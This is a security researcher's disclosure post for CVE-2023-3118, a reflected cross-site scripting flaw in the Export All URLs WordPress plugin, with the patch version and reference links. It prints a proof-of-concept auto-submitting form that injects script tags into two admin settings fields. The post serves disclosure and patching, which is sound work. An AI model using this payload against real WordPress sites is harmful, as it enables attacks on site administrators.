CVE-2023-3118 - Reflected Cross-Site Scripting Vulnerability in Export All URLs WordPress Plugin
During my recent code audit of various popular WordPress plugins, I discovered another vulnerability, this time in the Export All URLs WordPress plugin. This vulnerability, assigned CVE-2023-3118, allows for a reflected cross-site scripting (XSS) attack, which can be exploited against high privilege users, including administrators. This article provides detailed information about the vulnerability, its impact, and recommended actions to mitigate the risk.
The vulnerability can be triggered by making a logged-in admin user visit a page containing the following HTML code:
<body onload="document.forms.submit()"> <form action="https://example.com/wp-admin/tools.php?page=extract-all-urls-settings" method="POST"> <input type="hidden" name="starting-point" value='"><script>alert(/XSS-starting-point/)</script>' /> <input type="hidden" name="ending-point" value='"><script>alert(/XSS-ending-point/)</script>' /> <input type="submit" value="submit"> </form> </body>
To address this vulnerability, the maintainers of the Export All URLs WordPress plugin have released an updated version (4.6) that properly sanitizes and escapes user-supplied input.
The reflected cross-site scripting (XSS) vulnerability exists in the Export All URLs WordPress plugin versions prior to 4.6. Users of affected versions should update to the latest version as soon as possible to protect their WordPress installations from potential exploitation.
- Export All URLs Plugin: https://wordpress.org/plugins/export-all-urls/
- CVE-2023-3118: https://nvd.nist.gov/vuln/detail/CVE-2023-3118
- WP-Scan: https://wpscan.com/vulnerability/8a9efc8d-561a-42c6-8e61-ae5c3be581ea